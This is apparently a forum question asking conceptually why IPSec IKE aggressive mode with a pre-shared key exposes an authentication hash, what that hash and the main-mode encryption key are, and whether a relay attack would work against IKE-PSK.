There is many articles that describe some exploitation techniques on a VPN with IPSec - IKE-PSK.
However, I can't understand how the flaws may exist. Thus, I have some question relating to that:
1) Why, in Aggressive mode, the authentication hash is transmitted as response to the initial packet of the VPN client that wants to establish an IPSec Tunnel ? As a result of this, anyone on the Internet may get an authentication hash from any VPN servers exposed on the Internet. A more secure way may be that the client must send first the authentication hash right?
2) What is exactly that authentication hash? Is it a message hashed with the PSK?
3) When we say that the hash is encrypted in Main Mode, what is the encryption key used?
4) Is it possible to simply perform a relay attack (like SMB relay for example), when a client tries to connect to the VPN server? I don't see any reason that you can't do that, as identity peer is not checked with IKE-PSK. This solution is easier than cracking the hash...but no article talks about it.
Thanks for your answers
